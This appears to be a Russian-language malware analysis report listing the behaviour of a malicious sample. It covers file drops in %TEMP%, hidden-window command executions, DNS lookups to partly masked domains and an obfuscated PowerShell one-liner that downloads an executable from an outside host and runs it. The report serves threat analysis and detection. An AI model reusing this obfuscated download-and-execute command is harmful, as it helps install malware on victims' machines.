Техническая информация
- $asikw как %temp%\yjmh.exe
- '<SYSTEM32>\cmd.exe' /C PO^We^Rs^HELl "'Pow^er^Sh^ell ""function Qqwcgepsavl([String] $asikw){(neW-oBjEcT systEm.nEt.WEbCLIENT).doWNlOAdFiLe($asikw,''%TMP%\Yjmh.exE'');sTArT-pRocEsS ''%TMP%\Yjmh.exE'';}try{Qqwcg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\1169492.cvr
- %TEMP%\jpiptb.bat
- '6-###ress.ch':80
- http://6-###ress.ch/not.png
- DNS ASK tr#####ha-dinnie.co.uk
- DNS ASK 6-###ress.ch
- '<SYSTEM32>\cmd.exe' /C PO^We^Rs^HELl "'Pow^er^Sh^ell ""function Qqwcgepsavl([String] $asikw){(neW-oBjEcT systEm.nEt.WEbCLIENT).doWNlOAdFiLe($asikw,''%TMP%\Yjmh.exE'');sTArT-pRocEsS ''%TMP%\Yjmh.exE'';}try{Qqwcg...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Jpiptb.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Jpiptb.bat" "